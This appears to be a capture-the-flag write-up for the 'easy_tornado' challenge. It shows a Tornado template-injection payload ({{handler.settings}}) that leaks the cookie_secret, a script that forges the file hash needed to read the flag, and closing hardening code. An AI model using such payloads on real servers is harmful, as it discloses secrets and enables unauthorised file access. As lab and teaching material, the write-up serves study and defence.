Vulnerability reproduction: easy_tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environment ]
windows
[ Tools ]
Firefox
[ Steps ]
Tornado is a Python web application framework.
Opening the challenge shows three documents:
flag.txt
/flag.txt
flag in /fllllllllllllag
So the flag is in the file /fllllllllllllag.
welcome.txt
/welcome.txt
render
render is a rendering function in Python that renders variables into a template, so different pages can be produced by passing different parameters.
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
So filehash=md5(cookie_secret+md5(filename)). Here filename=/fllllllllllllag, so we only need to know cookie_secret to access the flag.
After testing, I found an additional error page with the format /error?msg=Error, which suggests a server-side template injection (SSTI) vulnerability.
Try /error?msg={{datetime}}. In Tornado page templates, datetime refers to Python's datetime module. Tornado provides some object aliases for quick access to objects; see the official Tornado documentation.
Looking up the documentation shows that cookie_secret is stored in the settings attribute of the Application object, and that self.application.settings has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler is the RequestHandler object that handles the current page. RequestHandler.settings points to self.application.settings, so handler.settings points to RequestHandler.application.settings.
Construct a payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Calculate the filehash value:
import hashlib


def md5(s):
    # hashlib needs bytes in Python 3, so encode the string first
    h = hashlib.md5()
    h.update(s.encode('utf-8'))
    return h.hexdigest()


def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    # filehash = md5(cookie_secret + md5(filename))
    print(md5(cookie_secret + md5(filename)))


if __name__ == '__main__':
    filehash()
payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
This successfully returns the flag.
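The filehash check only proves knowledge of cookie_secret, so once the template injection discloses that value the check no longer restricts which file is served. As an added example (not code from the challenge or from the original post), the sketch below puts the hints.txt scheme beside a hardened variant; the secret, the signing key, the allow-list and all function names are constructed assumptions.

```python
import hashlib
import hmac

# Constructed sample values (assumptions, not taken from the challenge server).
COOKIE_SECRET = "constructed-cookie-secret"
LINK_KEY = b"constructed-link-signing-key"  # dedicated key, never reused as cookie_secret
ALLOWED_FILES = {"/flag.txt", "/welcome.txt", "/hints.txt"}  # files meant to be served


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def legacy_filehash(secret: str, filename: str) -> str:
    """Scheme from hints.txt: md5(cookie_secret + md5(filename))."""
    return md5_hex(secret + md5_hex(filename))


def legacy_check(filename: str, filehash: str) -> bool:
    # Any path is accepted as long as the hash matches, so the secret is the only barrier.
    return filehash == legacy_filehash(COOKIE_SECRET, filename)


def sign_link(filename: str) -> str:
    """Hardened token: HMAC-SHA256 under a key used for nothing else."""
    return hmac.new(LINK_KEY, filename.encode("utf-8"), hashlib.sha256).hexdigest()


def hardened_check(filename: str, token: str) -> bool:
    # 1) Only files on the allow-list are eligible, whatever the token says.
    if filename not in ALLOWED_FILES:
        return False
    # 2) Compare as bytes in constant time to avoid leaking match position.
    expected = sign_link(filename).encode("ascii")
    return hmac.compare_digest(expected, token.encode("utf-8"))


if __name__ == "__main__":
    target = "/fllllllllllllag"
    # Legacy scheme: a correctly computed hash opens a file that was never linked.
    print(legacy_check(target, legacy_filehash(COOKIE_SECRET, target)))
    # Hardened scheme: a valid MAC is still refused for a path off the allow-list.
    print(hardened_check(target, sign_link(target)))
    print(hardened_check("/hints.txt", sign_link("/hints.txt")))
```

The root cause remains the error page rendering user input as a template; the hardened check limits what a disclosed secret can reach but does not replace fixing that.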